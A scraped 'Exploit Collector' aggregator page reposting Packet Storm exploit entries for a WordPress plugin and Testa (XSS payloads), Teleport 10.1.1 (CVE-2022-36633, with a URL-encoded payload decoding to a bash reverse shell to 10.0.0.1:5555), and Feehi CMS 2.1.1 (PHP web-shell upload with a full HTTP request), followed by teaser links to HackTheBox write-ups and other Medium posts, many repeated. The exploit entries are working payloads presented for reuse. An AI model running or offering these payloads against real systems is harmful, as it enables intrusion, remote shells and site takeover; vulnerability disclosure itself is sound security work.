Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress 3dady Real-Time Web Stats 1.0 Cross Site Scripting
https://4.bp.blogspot.com/-42b-8Yu8ql4/WWlvfoDuyhI/AAAAAAAAIQE/GMGQD7Uo7DMncRccI_LNcWgfvYRkd0zwQCLcBGAs/s1600/h86.png
WordPress 3dady Real-Time Web Stats plugin version 1.0 suffers from a persistent cross site scripting vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress 3dady Real-Time Web Stats 1.0 Cross Site Scripting
https://4.bp.blogspot.com/-42b-8Yu8ql4/WWlvfoDuyhI/AAAAAAAAIQE/GMGQD7Uo7DMncRccI_LNcWgfvYRkd0zwQCLcBGAs/s1600/h86.png
WordPress 3dady Real-Time Web Stats plugin version 1.0 suffers from a persistent cross site scripting vulnerability.
SHA-256 |
9bc44384be766635f2fbfc237ec0aeb19285a6e3efb8c861d02d2212924dd3feDownload
# Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/
# Date: 2022-08-24
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: https://profiles.wordpress.org/3dady/
# Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip
# Category: Web Application
# Version: 1.0
# Tested on: Debian / WordPress 6.0.1
# CVE : N/A
# 1. Technical Description:
The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text
and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of
JavaScript code that can exploit the vulnerability.
# 2. Proof of Concept (PoC):
a. Install and activate version 1.0 of the plugin.
b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady).
c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text):
" autofocus onfocus=alert(/XSS/)>
d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed.
Note: This change will be permanent until you modify the edited fields.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress 3dady Real-Time Web Stats 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Testa 3.5.1 Cross Site Scripting
https://3.bp.blogspot.com/-Qhp4qePCt4w/WWlvgnoLBHI/AAAAAAAAIQQ/Pg-5D4V1nfk8Sq6EZO_I88mZqTiN0MsZgCLcBGAs/s1600/h89.png
Testa Online Test Management System version 3.5.1 suffers from a cross site scripting vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Testa 3.5.1 Cross Site Scripting
https://3.bp.blogspot.com/-Qhp4qePCt4w/WWlvgnoLBHI/AAAAAAAAIQQ/Pg-5D4V1nfk8Sq6EZO_I88mZqTiN0MsZgCLcBGAs/s1600/h89.png
Testa Online Test Management System version 3.5.1 suffers from a cross site scripting vulnerability.
SHA-256 |
e9867bdeeba70c36ee85639c18dbb98c4422fde1467af31cc0a26c7ec8e89a09Download
# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
# Date: 28/08/2022
# Exploit Author: Ashkan Moghaddas
# Vendor Homepage: https://testa.cc
# Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip
# Version: 3.5.1
# Tested on: Windows/Linux
# Proof of Concept:
# 1- Install Testa 3.5.1
# 2- Go to https://localhost.com/login.php?redirect=XXXX
# 3- Add payload to the Tab, the XSS Payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
# 4- XSS has been triggered.
# Go to this url "
https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
"
XSS will trigger.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Testa 3.5.1 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Teleport 10.1.1 Remote Code Execution
https://2.bp.blogspot.com/-NrOPg3Mty0U/WWlvlwk6sbI/AAAAAAAAIRI/oNtlpfQhQf0CXQthUyFzuVS3vq_pC_VnACLcBGAs/s1600/hack_img2.png
Teleport version 10.1.1 suffers from a remote code execution vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Teleport 10.1.1 Remote Code Execution
https://2.bp.blogspot.com/-NrOPg3Mty0U/WWlvlwk6sbI/AAAAAAAAIRI/oNtlpfQhQf0CXQthUyFzuVS3vq_pC_VnACLcBGAs/s1600/hack_img2.png
Teleport version 10.1.1 suffers from a remote code execution vulnerability.
SHA-256 |
c6d52b424ef6fecae4f1b523bd776835ab95ce19413a32ddacde1e3e5c128f9eDownload
# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
# Date: 08/01/2022
# Exploit Author: Brandon Roach & Brian Landrum
# Vendor Homepage: https://goteleport.com
# Software Link: https://github.com/gravitational/teleport
# Version: < 10.1.2
# Tested on: Linux
# CVE: CVE-2022-36633
Proof of Concept (payload):
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=
f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=
0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=
method=3Diam
Decoded payload:
"
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1&1 #
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Teleport 10.1.1 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Feehi CMS 2.1.1 Remote Code Execution
https://3.bp.blogspot.com/-L1ywDwIvHnM/WWlvbqBqi6I/AAAAAAAAIPQ/e-y1sGxHKpMGeO7A8b-5LHWSXrbuRWhUwCLcBGAs/s1600/h73.png
Feehi CMS version 2.1.1 suffers from an authenticated remote code execution vulnerability.
SHA-256 |
Download
# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 22-08-2022
# Exploit Author: yuyudhn
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
# Version: 2.1.1 (REQUIRED)
# Tested on: Linux, Docker
# CVE : CVE-2022-34140
# Proof of Concept:
1. Login using admin account at http://feehi-cms.local/admin
2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex
3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.
5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php
# Burp request example:
POST /admin/index.php?r=ad%2Fcreate HTTP/1.1
Host: feehi-cms.local
Content-Length: 1530
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://feehi-cms.local
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D
Connection: close
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="_csrf_backend"
FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[name]"
rce
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[tips]"
rce at Ad management
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[input_type]"
1
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[ad]"
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"
Content-Type: image/png
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Feehi CMS 2.1.1 Remote Code Execution
https://3.bp.blogspot.com/-L1ywDwIvHnM/WWlvbqBqi6I/AAAAAAAAIPQ/e-y1sGxHKpMGeO7A8b-5LHWSXrbuRWhUwCLcBGAs/s1600/h73.png
Feehi CMS version 2.1.1 suffers from an authenticated remote code execution vulnerability.
SHA-256 |
983f5ef29aec5a308538a5a0f342863532963a034a2146d2f5d3fe9bcb54fe54Download
# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 22-08-2022
# Exploit Author: yuyudhn
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
# Version: 2.1.1 (REQUIRED)
# Tested on: Linux, Docker
# CVE : CVE-2022-34140
# Proof of Concept:
1. Login using admin account at http://feehi-cms.local/admin
2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex
3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.
5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php
# Burp request example:
POST /admin/index.php?r=ad%2Fcreate HTTP/1.1
Host: feehi-cms.local
Content-Length: 1530
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://feehi-cms.local
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D
Connection: close
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="_csrf_backend"
FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[name]"
rce
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[tips]"
rce at Ad management
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[input_type]"
1
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[ad]"
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"
Content-Type: image/png
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Feehi CMS 2.1.1 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HackTheBox — Fawn — Writeup
https://cdn-images-1.medium.com/max/1280/0*_8UMBYdq5PT7XRlc
Another day for another writeup. This time I am continuing my path on HackTheBox called Starting Point. I am on Tier 0 which is the first…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HackTheBox — Fawn — Writeup
https://cdn-images-1.medium.com/max/1280/0*_8UMBYdq5PT7XRlc
Another day for another writeup. This time I am continuing my path on HackTheBox called Starting Point. I am on Tier 0 which is the first…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HackTheBox — Fawn — Writeup
Another day for another writeup. This time I am continuing my path on HackTheBox called Starting Point. I am on Tier 0 which is the first…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HackTheBox — Meow — Writeup
https://cdn-images-1.medium.com/max/1280/0*IJGYwjKWHAZXTuxX
Let’s try some writing skills. As my first post I decided to post a writeup for the machine called Meow on HackTheBox. This is the first…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HackTheBox — Meow — Writeup
https://cdn-images-1.medium.com/max/1280/0*IJGYwjKWHAZXTuxX
Let’s try some writing skills. As my first post I decided to post a writeup for the machine called Meow on HackTheBox. This is the first…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HackTheBox — Meow — Writeup
Let’s try some writing skills. As my first post I decided to post a writeup for the machine called Meow on HackTheBox. This is the first…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HackTheBox — Dancing — Writeup
https://cdn-images-1.medium.com/max/1280/0*taknOgOHkbvxS0D5
This time we are going to exploit the Dancing machine which is Windows machine this time. This machine runs SMB service on port 445 and…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HackTheBox — Dancing — Writeup
https://cdn-images-1.medium.com/max/1280/0*taknOgOHkbvxS0D5
This time we are going to exploit the Dancing machine which is Windows machine this time. This machine runs SMB service on port 445 and…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HackTheBox — Dancing — Writeup
This time we are going to exploit the Dancing machine which is Windows machine this time. This machine runs SMB service on port 445 and…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Keystroke Injections
https://cdn-images-1.medium.com/max/1280/1*MkSL1-N48BxbfeTKlsJCsw.jpeg
It’s development was mainly focused to ease the work for security engineers and pentesters. The automation of keystroke injection…
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Keystroke Injections
https://cdn-images-1.medium.com/max/1280/1*MkSL1-N48BxbfeTKlsJCsw.jpeg
It’s development was mainly focused to ease the work for security engineers and pentesters. The automation of keystroke injection…
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Keystroke Injections
It’s development was mainly focused to ease the work for security engineers and pentesters. The automation of keystroke injection…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Primer Hackathon de Polkadot en Latinoamérica!!!
https://cdn-images-1.medium.com/max/1280/1*EaRdtQjjf5ksaCqoigrbvw.jpeg
La comunidad y los embajadores de Polkadot desarrollarán el Primer Hackathon enfocado en el ecosistema de Polkadot en América Latina.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Primer Hackathon de Polkadot en Latinoamérica!!!
https://cdn-images-1.medium.com/max/1280/1*EaRdtQjjf5ksaCqoigrbvw.jpeg
La comunidad y los embajadores de Polkadot desarrollarán el Primer Hackathon enfocado en el ecosistema de Polkadot en América Latina.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Primer Hackathon de Polkadot en Latinoamérica!!!
La comunidad y los embajadores de Polkadot desarrollarán el Primer Hackathon enfocado en el ecosistema de Polkadot en América Latina.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Todo lo que necesitas para administrar la seguridad de tu organización a través de una plataforma…
https://cdn-images-1.medium.com/max/1786/0*GsgC3GX9t7z-qi8-
El panorama de las amenazas hoy en día es cada vez más sofisticado que nunca, al grado que el costo de la ciberdelincuencia alcanzó los…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Todo lo que necesitas para administrar la seguridad de tu organización a través de una plataforma…
https://cdn-images-1.medium.com/max/1786/0*GsgC3GX9t7z-qi8-
El panorama de las amenazas hoy en día es cada vez más sofisticado que nunca, al grado que el costo de la ciberdelincuencia alcanzó los…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Todo lo que necesitas para administrar la seguridad de tu organización a través de una plataforma de ciberseguridad
El panorama de las amenazas hoy en día es cada vez más sofisticado que nunca, al grado que el costo de la ciberdelincuencia alcanzó los USD…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HackTheBox — Sequel — Writeup
https://cdn-images-1.medium.com/max/702/1*6QvqmKW0RZ-vIkEcEMQQFA.png
This time I did the Sequel machine from HackTheBox. This one was a MariaDB running machine with poorly configured password.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HackTheBox — Sequel — Writeup
https://cdn-images-1.medium.com/max/702/1*6QvqmKW0RZ-vIkEcEMQQFA.png
This time I did the Sequel machine from HackTheBox. This one was a MariaDB running machine with poorly configured password.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HackTheBox — Sequel — Writeup
This time I did the Sequel machine from HackTheBox. This one was a MariaDB running machine with poorly configured password.